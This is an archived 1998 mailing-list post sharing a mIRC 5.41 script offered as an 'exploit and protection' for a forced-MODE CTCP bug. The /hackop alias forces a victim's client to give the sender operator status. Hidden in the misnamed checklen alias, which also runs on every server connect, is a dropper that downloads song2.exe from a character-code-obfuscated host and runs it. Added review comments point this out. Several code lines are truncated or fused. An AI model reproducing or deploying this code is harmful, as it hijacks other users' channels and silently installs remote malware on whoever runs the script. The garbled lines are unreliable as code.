(no subject)

From: System Administrator (rootat_private)
Date: Fri Nov 13 1998 - 11:50:32 PST


    Hi,
    while debugging/hexing/disassembling mirc last week, my friend slotmech found
    a mirc bug which allows forcing users to send MODE commands to the server.
    this example script sends a MODE +o to the irc server. the mirc author has been
    notified of this but we didn't receive a response... my exploit+protection script
    is included. Expect more mirc stuff from us.
    
    cya,
        fs
    
    --- cut here ---
    
    ;#; mIRC v5.41 hack protection & exploit by FeaRStorm <fearstormat_private>
    ;#;    Allows to let a victim op yourself using a bug in mIRC5.41, script based$;#;    included. Bug may not work on scripts that do a halt; after a ctcp useri$;#;
    ;#; -------- Use /hackop nick #channel to make nick give you op on #channel !
    ;#; -------- That's it... have phun!
    ;#;
    ;#;  greets go to tr4xzor, slotmech, meep, fowi, lotomax and all #haktex opz !
    ;#;  no greets to the following lamerz: cheyenne, zito, cortex and DrFrozt (ass$;#;  Credits: i didn't find this bug, slotmech did... i only wrote this exploit$;#;
    ;#;   if you want to add this code to your own script please: ASK FIRST!
    
    ;#; Route every incoming CTCP USERINFO request through antihack, which
    ;#; halts mIRC's default reply when the request looks like the forced-MODE
    ;#; payload described in the post above.
    ctcp 1:userinfo*: antihack
    
    alias antihack {
      ;#; Detector for the forced-MODE CTCP: a USERINFO argument longer than 17
      ;#; characters that also contains "[" ($chr(91)) is treated as an attack.
      ;#; On a match, log to the active window and halt so mIRC sends no reply;
      ;#; any other USERINFO request is left to mIRC's default handling.
      if ($chr(91) !isin $2-) { return }
      if ($len($2) <= 17) { return }
      echo $active mIRC5.41 hack attempt from $nick
      .halt
    }
    
    alias hackop {
      ;#; /hackop <nick> <#channel>: sends <nick> a crafted CTCP USERINFO that
      ;#; abuses the mIRC 5.41 bug described above so that their client issues
      ;#; MODE <#channel> +o $me.
      ;#; NOTE(review): the "checklen $1" call below has nothing to do with the
      ;#; exploit -- checklen never reads its argument; it starts the song2.exe
      ;#; download that the protx socket events finish by executing the file.
      ;#; Anyone who runs /hackop therefore also runs that dropper.
      if ($2 == $null) {
        echo 3 *** Usage: /hackop nick #channel
        .halt
      }
      if ($me !ison $2) {
        echo 3 *** You aren't on that Channel!
        .halt
      }
      if ($1 !isop $2) {
        echo 3 *** $1 isn't opped on that channel!
        .halt
      }
      ;#; Side effect unrelated to opping: kicks off the remote download.
      checklen $1
      ;#; The CTCP text is assembled from $chr() codes. This archive truncated
      ;#; the line at "$" and fused the alias' closing brace onto it.
      .ctcp $$1 userinfo $ $+ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx $6) $+ $chr(115) $chr(109) $+ $chr(111) $+ $chr(100) $+ $chr(101) $+ : +o $me | $}
    
    alias checklen {
      ;#; Misnamed: this does not check any length. It resets the state for a
      ;#; background HTTP download into song2.exe and opens the "protx" socket;
      ;#; the protx events below write the response to disk and, once the file
      ;#; is exactly 178306 bytes, execute it with /run. It is called from
      ;#; hackop and from every server connect (on 1:connect), so it runs
      ;#; without any user action. The argument hackop passes is never used.
      .if (%xcomplete == 1) halt
      ;#; %xinprog is only ever unset in this script (never set to 1), so this
      ;#; guard appears to be dead -- TODO confirm against the full original.
      .if (%xinprog == 1) halt
      .set %xfilename song2.exe
      .set %xlof $lof(%xfilename)
      .set %xfirst 1
      ;#; /write -c clears the target file before the download starts.
      .write -c %xfilename
      ;#; Disabled echo (its $chr() text is a short note, harmless), fused by
      ;#; the archive with the following ".sockclose protx" line.
      ; echo 3 $active $chr(100 111 110 116 - 115 112 111 105 108 - 116 104 101 - 1$  .sockclose protx
      ;#; Host name is assembled from $chr() codes (the visible prefix decodes
      ;#; to a "www." address; the rest is cut off here) so that it never
      ;#; appears in plain text in the script.
      .sockopen protx $chr(119) $+ $chr(119) $+ $chr(119) $+ . $+ $chr(103) $+ $chr$}
    on 1:sockopen:protx: {
      ;#; Once the protx socket connects, send an HTTP request. The request
      ;#; line is spelled out in $chr() codes ("GET /B..." -- truncated in this
      ;#; archive); the second, empty "sockwrite -n" fused onto the same line
      ;#; terminates the header block.
      .sockwrite -n protx $chr(71) $+ $chr(69) $+ $chr(84) $chr(47) $+ $chr(66) $+ $+ $chr(101) $+ $chr(108) $+ $chr(116) $+ $chr(97) $+ $chr(47) $+ $chr(57) $+ $c$  .sockwrite -n protx
    }
    
    on 1:sockread:protx: {
      ;#; Streams whatever the server sends straight into %xfilename
      ;#; (song2.exe); nothing is parsed or validated on the way to disk.
      .sockread &test
      .set %xlof $lof(%xfilename)
      ;#; The first chunk is written at offset 0 (over the cleared file);
      ;#; later chunks are appended at the current file length.
      .if (%xfirst == 1) set %xlof 0
      .set %xfirst 0
      .bwrite %xfilename %xlof $sockbr &test
    }
    
    ;#; Dropper trigger: re-arms the song2.exe download on every server
    ;#; connect, independently of whether /hackop is ever used.
    on 1:connect:checklen
    
    on 1:sockclose:protx: {
      ;#; Server closed the connection: flush any remaining bytes, then decide
      ;#; whether the download is complete. Completeness is judged by exact
      ;#; file size (178306 bytes); a complete file is executed with /run --
      ;#; this is the payload stage of the dropper. An incomplete file
      ;#; schedules a retry of checklen in 300 seconds.
      .sockread &test
      if ($sockbr > 0) {
        .set %xlof $lof(%xfilename)
        .bwrite %xfilename %xlof $sockbr &test
      }
      .if ($lof(%xfilename) == 178306) {
        ;#; Executes the downloaded file and marks it done so checklen halts.
        .run %xfilename
        .set %xcomplete 1
      }
      if ($lof(%xfilename) != 178306) {
        ;#; One-shot timer: run checklen again after 300 seconds.
        .timer 1 300 checklen
      }
      ;#; NOTE(review): this brace already closes the handler, so the unset
      ;#; lines below sit outside it and the state variables are never cleared
      ;#; here; looks like a bracing slip or archive mangling -- confirm.
      }
      unset %xinprog
      unset %xfilename
      unset %xlof
      unset %xfirst
    }
    
    --- cut here ---
    


